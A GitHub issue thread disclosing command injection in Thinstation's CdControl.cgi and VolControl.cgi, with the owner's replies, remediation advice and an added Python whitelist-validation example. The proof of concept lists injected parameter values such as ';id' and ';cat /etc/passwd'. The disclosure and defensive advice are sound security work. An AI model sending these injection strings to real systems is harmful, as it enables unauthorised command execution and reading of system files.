
CGI Generic Command Execution #427

Closed
memN0ps opened this issue Jun 6, 2019 · 5 comments

@memN0ps commented Jun 6, 2019

The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi-bin/CdControl.cgi and /cgi-bin/VolControl.cgi.

PoC:
/cgi-bin/CdControl.cgi:

action=;id
eject;ifconfig
back;ls -alt
forward;whoami
pause;hostname

/cgi-bin/VolControl.cgi:

OK=;cat /etc/passwd

Please patch asap. Does affect latest version.

For more information read: https://www.owasp.org/index.php/Command_Injection

memN0ps changed the title from "CGI Generic Command Execution (Tested on 6.1) Could affect latest version" to "CGI Generic Command Execution" on Jun 6, 2019

@Thinstation (Owner) commented Jun 6, 2019

You have a recommendation?

@memN0ps (Author) commented Jun 6, 2019

- Avoid calling OS commands directly.
- Validate user input against a whitelist of permitted values.
- For more information, refer to:
  https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.md
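As an added illustration of the whitelist recommendation above (hypothetical example code, not Thinstation's CGI scripts), this handler accepts the `action` parameter only if it is exactly one of a fixed set of names and then builds an argv list for a CD-control tool rather than a shell command line; the tool path `/usr/bin/cdctl` and the allowed action names are assumptions. It also shows, without running anything, the shell line a naive concatenation would produce for the payloads quoted in this issue.

```python
from urllib.parse import parse_qs

# Assumed whitelist: the only values CdControl.cgi should ever act on.
ALLOWED_ACTIONS = frozenset({"eject", "back", "forward", "pause", "play"})
CD_TOOL = "/usr/bin/cdctl"  # hypothetical helper binary


def validate_param(query_string, name, allowed):
    """Return the parameter value if it is exactly one whitelisted value, else None.

    parse_qs percent-decodes first, so the comparison happens on the decoded
    value; an encoded ';' (%3B) is therefore rejected just like a literal one.
    """
    values = parse_qs(query_string, keep_blank_values=True).get(name, [])
    if len(values) != 1:          # missing or repeated parameter is rejected
        return None
    value = values[0]
    return value if value in allowed else None


def build_argv(query_string):
    """argv list for the CD tool, or None when the request is rejected.

    Passing a list (shell=False) means metacharacters such as ';' would never
    reach a shell even if the whitelist check were somehow bypassed.
    """
    action = validate_param(query_string, "action", ALLOWED_ACTIONS)
    if action is None:
        return None
    return [CD_TOOL, action]


def naive_shell_line(query_string):
    """The string a string-concatenating CGI would hand to the shell (never executed here).

    Shown only to make the failure mode visible: the raw parameter value is
    spliced into a command line, so a ';' terminates the intended command.
    """
    values = parse_qs(query_string, keep_blank_values=True).get("action", [""])
    return CD_TOOL + " " + values[0]
```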

@Thinstation (Owner) commented Jun 6, 2019

The webserver has very limited system privileges. Common attacks like rt'ing the passwd file can be mitigated by locking the password, and only allowing a single auto-login.

Thinstation closed this Jun 7, 2019

@Thinstation (Owner) commented Jun 17, 2019

Notice to users. Don’t include the www package in your build if your end points might contain sensitive information accessible from an unprivileged user. It’s kind of a No-duh, but now it’s documented.
